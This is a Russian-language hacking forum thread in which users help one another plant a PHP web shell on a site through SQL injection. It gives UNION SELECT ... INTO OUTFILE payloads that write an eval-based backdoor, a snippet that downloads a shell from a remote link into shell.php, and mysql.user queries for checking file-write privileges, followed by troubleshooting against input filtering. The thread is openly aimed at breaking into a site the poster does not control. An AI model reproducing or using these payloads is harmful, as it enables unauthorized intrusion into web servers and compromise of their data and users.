Ребят подскажите что делать вот например есть сайт доступ в базу есть хочу залить на сайт <?eval[`e`]?> через это) и тут возникли 2 вопроса 1) как узнать есть ли у пользователя доступ на запись? 2) если узнаю пути как далее действовать? это? Code: http://site.ru/cat.php?id=-1' UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php и как потом залить фаил на шелл если все получится?
Code: http://site.ru/cat.php?id=-1' UNION SELECT 1,2,3,'<?php eval(base64_decode($_GET[‘e’])); ?>',5,6 INTO OUTFILE '1.php Лучше так. И в 1.php?e=(строка зашифрованая в бэйс64) А код типа <? $fh = fopen('shell.php', "a+"); fwrite($fh, file_get_contents('ссылка на шелл')); fclose($fh); ?>
Code: http://site.ru/cat.php?id=-1' UNION SELECT 1,2,3,file_priv,5,6 from mysql.user where user='текущий юзер'+--+
Ребят не работает 99999+and+1=0+union+select+1,2,3,file_priv,5,6,7,8,9+from+mysql.user+where+user='user' но проходит ошибка и ничего не выводится)
1) Если на сервере сидит 2 и более юзеров, то запрос 99999+and+1=0+union+select+1,2,3,file_priv,5,6,7,8 ,9+from+mysql.user Если появиться Y то заливай шелл, если нет, то пока... 2) 1 юзер запрос 99999+and+1=0+union+select+1,2,3,file_priv,5,6,7,8 ,9+from+mysql.user+where+user='root'
Нет не на всех. Значит где-то фильтруется запрос...скорее всего + или другой знак...но все таки можно залить шелл.
так а каким методом тогда его залить? ведь если фильтрация то запрос не пройдет) и следовательно не создастся файл
этот вопрос уже столько раз обсуждался на форуме, что тошно уже от него..твоя тема уже наверное тысячная, без линка никто тебе не скажет как залить шелл .
